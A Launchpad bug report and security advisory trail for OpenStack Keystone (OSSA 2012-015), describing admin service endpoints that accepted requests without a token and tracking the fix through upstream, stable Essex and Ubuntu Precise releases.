OpenStack Identity (Keystone)

[OSSA 2012-015] API v2.0/OS-KSADM/services, v2.0/OS-KSADM/services/{service_id} doesn't validate token

Reported by Jason Xu on 2012-05-31
254
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Keystone
Critical
Dolph Mathews
Essex
Critical
Unassigned
OpenStack Security Advisory
Undecided
Russell Bryant
keystone (Ubuntu)
Undecided
Unassigned
Precise
Undecided
Unassigned

Bug Description

API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})doesn't validate token

it can get, create, delete service without a X-Auth-Token.

Attached is a diff of the changes.

Jason Xu (yinyangxu) wrote :
Jason Xu (yinyangxu) on 2012-05-31
summary: - API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})
+ API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})doesn't
+ validate token
Dolph Mathews (dolph) on 2012-06-02
Changed in keystone:
importance: Undecided → Critical
status: New → Triaged
milestone: none → folsom-2

I successfully deleted a service without providing an X-Auth-Token in the DELETE request at all: http://paste.openstack.org/raw/18322/

Changed in keystone:
assignee: nobody → Dolph Mathews (dolph)
status: Triaged → Confirmed

Fix proposed to branch: master
Review: https://review.openstack.org/8104

Changed in keystone:
status: Confirmed → In Progress
Alan Pevec (apevec) on 2012-06-04
tags: added: essex-backport

Reviewed: https://review.openstack.org/8104
Committed: http://github.com/openstack/keystone/commit/1d146f5c32e58a73a677d308370f147a3271c2cb
Submitter: Jenkins
Branch: master

commit 1d146f5c32e58a73a677d308370f147a3271c2cb
Author: Dolph Mathews <email address hidden>
Date: Sun Jun 3 11:00:54 2012 -0500

    Require authz for service CRUD (bug 1006822)

    Change-Id: Ia90f0aa2b856b9a9874d4865fb92ee913e8125c5

Changed in keystone:
status: In Progress → Fix Committed
Thierry Carrez (ttx) on 2012-07-04
Changed in keystone:
status: Fix Committed → Fix Released

Reviewed: https://review.openstack.org/9014
Committed: http://github.com/openstack/keystone/commit/24df3adb3f50cbb5ada411bc67aba8a781e6a431
Submitter: Jenkins
Branch: stable/essex

commit 24df3adb3f50cbb5ada411bc67aba8a781e6a431
Author: Dolph Mathews <email address hidden>
Date: Sun Jun 3 11:00:54 2012 -0500

    Require authz for service CRUD (bug 1006822)

    Change-Id: Ia90f0aa2b856b9a9874d4865fb92ee913e8125c5

tags: added: in-stable-essex
Dave Walker (davewalker) on 2012-08-24
Changed in keystone (Ubuntu):
status: New → Fix Released
Changed in keystone (Ubuntu Precise):
status: New → Confirmed

Please find the attached test log from the Ubuntu Server Team's CI infrastructure. As part of the verification process for this bug, Keystone has been deployed and configured across multiple nodes using precise-proposed as an installation source. After successful bring-up and configuration of the cluster, a number of exercises and smoke tests have be invoked to ensure the updated package did not introduce any regressions. A number of test iterations were carried out to catch any possible transient errors.

Please Note the list of installed packages at the top and bottom of the report.

For records of upstream test coverage of this update, please see the Jenkins links in the comments of the relevant upstream code-review(s):

Trunk review: https://review.openstack.org/8104
Stable review: https://review.openstack.org/9014

As per the provisional Micro Release Exception granted to this package by the Technical Board, we hope this contributes toward verification of this update.

The verification of this Stable Release Update has completed successfully and the package has now been released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regresssions.

This bug was fixed in the package keystone - 2012.1+stable~20120824-a16a0ab9-0ubuntu2

---------------
keystone (2012.1+stable~20120824-a16a0ab9-0ubuntu2) precise-proposed; urgency=low

  * New upstream release (LP: #1041120):
    - debian/patches/0013-Flush-tenant-membership-deletion-before-user.patch:
      Dropped.
  * Resynchronize with stable/essex:
    - authenticate in ldap backend doesn't return a list of roles
      (LP: #1035428)
    - LDAP should not check username on "sn" field (LP: #997700)
    - Admin API doesn't valid token. (LP: #1006815, #1006822)
    - Memcache token backend eventually stops working. (LP: #1012381)
    - EC2 credentials not migrated from legacy (diablo) database. (LP: #1016056)
    - Deleting tenants or users does not cleanup metadata. (LP: #973243)
    - Deleting tenants does not cleanup its user associations. (LP: #974199)
    - TokenNotFound not raised in testsuite beacuse of timezone issues. (LP: #983800)
    - Token authentication for a user in a disabled tenant does not raise
      Unauthorized error. (LP: #988920)
    - export_legacy_catalog doesn't convert url names correctly. (LP: #994936)
    - Following a password compromise and subsequent password change,
      tokens remain valid. (LP: #996595)
    - Tokens remain valid after a user account is disabled. (LP: #997194)
 -- Adam Gandelman <email address hidden> Fri, 24 Aug 2012 03:34:59 -0400

Changed in keystone (Ubuntu Precise):
status: Confirmed → Fix Released
security vulnerability: no → yes
Thierry Carrez (ttx) on 2012-09-27
Changed in keystone:
milestone: folsom-2 → 2012.2
Russell Bryant (russellb) wrote :

An OSSA has been issued for this: https://lists.launchpad.net/openstack/msg17034.html

Thierry Carrez (ttx) on 2013-06-07
summary: - API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})doesn't
- validate token
+ [OSSA 2012-015] API(v2.0/OS-KSADM/services,v2.0/OS-
+ KSADM/services/{service_id})doesn't validate token
Changed in ossa:
assignee: nobody → Russell Bryant (russellb)
status: New → Fix Released
Thierry Carrez (ttx) on 2013-06-07
summary: - [OSSA 2012-015] API(v2.0/OS-KSADM/services,v2.0/OS-
- KSADM/services/{service_id})doesn't validate token
+ [OSSA 2012-015] API v2.0/OS-KSADM/services, v2.0/OS-
+ KSADM/services/{service_id} doesn't validate token
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers